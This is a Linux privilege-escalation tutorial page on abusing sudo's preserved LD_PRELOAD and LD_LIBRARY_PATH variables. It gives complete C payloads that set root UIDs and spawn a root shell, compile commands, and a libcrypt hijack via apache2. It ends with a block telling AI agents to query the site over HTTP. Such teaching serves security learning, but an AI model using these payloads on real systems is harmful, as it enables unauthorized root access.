# Environment Variables

Programs running via sudo can inherit variables from the environment of the user. If the **env\_reset** option is set in the **/etc/sudoers** config file, sudo will run the programs in a new, minimal *environment*. The **env\_keep** option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running **sudo -l**.

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.22.16-PM.png" alt=""><figcaption></figcaption></figure>

The **LD\_PRELOAD** and **LD\_LIBRARY\_PATH** are both inherited from the user's environment.

### LD\_PRELOAD <a href="#ld_preload" id="ld_preload"></a>

When a program is running, **LD\_PRELOAD** loads a shared object before any others. By writing a simple script with init() function, it will help us execute code as soon as the object is loaded.

First, create a shared object file with the following contents:

```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setresuid(0,0,0);
        system("/bin/bash -p");
}
```

Then, compile the script.

```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
```

And finally, run one of the programs you are allowed to run via sudo while setting the LD\_PRELOAD environment variable to the full path of the new shared object:

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.37.55-PM.png" alt=""><figcaption></figcaption></figure>

***

### LD\_LIBRARY\_PATH <a href="#ld_library_path" id="ld_library_path"></a>

The **LD\_LIBRARY\_PATH** contains a list of directories which search for shared libraries first.

First, print the shared libraries of a program.

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.40.46-PM.png" alt=""><figcaption></figcaption></figure>

Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the libcrypt.so.1 file.

```
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("/bin/bash -p");
}
```

Then, compile the script.

```
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
```

And finally, run apache2 using sudo, while settings the LD\_LIBRARY\_PATH environment variable to /tmp (where compiled shared object is located):

<figure><img src="https://atom.hackstreetboys.ph/content/images/2020/06/Screen-Shot-2020-06-10-at-3.46.01-PM.png" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rudrasec0x01.gitbook.io/linux-privesc/environment-variables.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.